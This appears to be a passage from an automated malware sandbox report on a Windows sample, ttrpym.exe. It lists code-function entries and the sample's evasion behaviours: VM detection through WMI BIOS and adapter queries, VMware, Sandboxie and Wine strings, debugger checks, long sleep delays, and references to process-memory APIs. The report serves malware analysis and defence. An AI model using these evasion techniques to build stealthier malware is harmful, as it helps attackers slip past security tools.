              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_0041C70E push ebx; ret 3_2_0041C70F
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_00410DB1 push ecx; ret 3_2_00410DC4
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_012C517A pushad ; ret 3_2_012C5181
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_012C5172 push esp; ret 3_2_012C5179
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_012C51A2 pushfd ; ret 3_2_012C51A9
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_012C73CB push ecx; retf 3_2_012C73D5
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_012CD67D push ebx; ret 3_2_012CD68A
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_012C4F38 push 3C012C51h; ret 3_2_012C4F3D
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_012C4F6E push esp; ret 3_2_012C4F91
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_0178591D push ebx; iretd 3_2_01785920
              Source: initial sample Static PE information: section name: .text entropy: 7.96541170313
              Source: 3.2.ttrpym.exe.f80000.2.unpack, e3nXyWx54eXrMCJOPu/eAcKHQHop2SvdpjExo.cs High entropy of concatenated method names: '.cctor', 'EJWuFMmTwcOCj', 'eWaH61iq7', 'eLDx5Mj1j', 'eGN9hjVJU', 'eJNVII0RA', 'NvQ34uZt895nxEhi2FIr', 'ecKhHQop2', 'eSvjdpjEx', 'eo35nXyW5'
              Source: C:\Users\user\Desktop\ttrpym.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\ttrpym.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
              Source: C:\Users\user\Desktop\ttrpym.exe Function Chain: threadResumed,threadDelayed,memAlloc,systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,systemQueried,memAlloc,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,memAlloc,threadAPCQueued,threadDelayed,threadDelayed,threadDelayed,threadDelayed
              Source: C:\Users\user\Desktop\ttrpym.exe Function Chain: threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,systemQueried,memAlloc,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,memAlloc,threadAPCQueued,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,memAlloc,memAlloc,memAlloc,memAlloc
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\ttrpym.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\ttrpym.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_00401470 _getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,CloseHandle,Module32Next,CloseHandle,CloseHandle,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,_memset,LoadLibraryA,GetProcAddress,CLRCreateInstance,GetProcAddress,GetModuleFileNameA,GetModuleFileNameW,3_2_00401470
              Source: C:\Users\user\Desktop\ttrpym.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\ttrpym.exe Window / User API: threadDelayed 756
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 6404 Thread sleep time: -31500s >= -30000s
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 6428 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 7112 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 7112 Thread sleep time: -6540000s >= -30000s
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 7112 Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 7112 Thread sleep time: -58156s >= -30000s
              Source: C:\Users\user\Desktop\ttrpym.exe TID: 7112 Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\ttrpym.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ttrpym.exe Last function: Thread delayed
              Source: ttrpym.exe, 00000000.00000002.264861199.0000000003030000.00000004.00000001.sdmp Binary or memory string: VMware
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmp Binary or memory string: vmware
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmp Binary or memory string: VMWARE
              Source: ttrpym.exe, 00000003.00000003.469859605.000000000122C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
              Source: ttrpym.exe, 00000000.00000002.264819317.0000000002FEF000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
              Source: ttrpym.exe, 00000000.00000002.264819317.0000000002FEF000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmp Binary or memory string: $l"SOFTWARE\VMware, Inc.\VMware Tools
              Source: ttrpym.exe, 00000000.00000002.264819317.0000000002FEF000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: ttrpym.exe, 00000000.00000002.264766297.0000000002FA1000.00000004.00000001.sdmp Binary or memory string: $l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: C:\Users\user\Desktop\ttrpym.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_004119BE _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_004119BE
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_00405550 VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualAlloc,VirtualAlloc,3_2_00405550
              Source: C:\Users\user\Desktop\ttrpym.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_004154E1 SetUnhandledExceptionFilter,3_2_004154E1
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_00415C0B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00415C0B
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: 3_2_00418E39 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00418E39
              Source: C:\Users\user\Desktop\ttrpym.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              .NET source code references suspicious native API functions
              Source: 3.2.ttrpym.exe.f80000.2.unpack, e3nXyWx54eXrMCJOPu/eAcKHQHop2SvdpjExo.cs Reference to suspicious API methods: ('eus1wv2xX', 'WriteProcessMemory@kernel32.dll'), ('eV0SEIQ9r', 'ReadProcessMemory@kernel32.dll'), ('eJNVII0RA', 'FindResource@kernel32.dll'), ('eL9ir86aw', 'LoadLibrary@kernel32'), ('eGN9hjVJU', 'VirtualProtect@kernel32.dll'), ('ev28wIJF8', 'GetProcAddress@kernel32'), ('ekpmC2OjU', 'VirtualProtect@kernel32.dll'), ('ewSXdJPgZ', 'OpenProcess@kernel32.dll')
              Source: C:\Users\user\Desktop\ttrpym.exe Process created: C:\Users\user\Desktop\ttrpym.exe {path}
              Source: ttrpym.exe, 00000003.00000002.617083257.0000000001B40000.00000002.00000001.sdmp Binary or memory string: uProgram Manager
              Source: ttrpym.exe, 00000003.00000002.617083257.0000000001B40000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
              Source: ttrpym.exe, 00000003.00000002.617083257.0000000001B40000.00000002.00000001.sdmp Binary or memory string: Progman
              Source: ttrpym.exe, 00000003.00000002.617083257.0000000001B40000.00000002.00000001.sdmp Binary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\ttrpym.exe Code function: GetLocaleInfoA,3_2_004198F0
              Source: C:\Users\user\Desktop\ttrpym.exe Queries volume information: C:\Users\user\Desktop\ttrpym.exe VolumeInformation
              Source: C:\Users\user\Desktop\ttrpym.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\ttrpym.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\ttrpym.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ttrpym.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
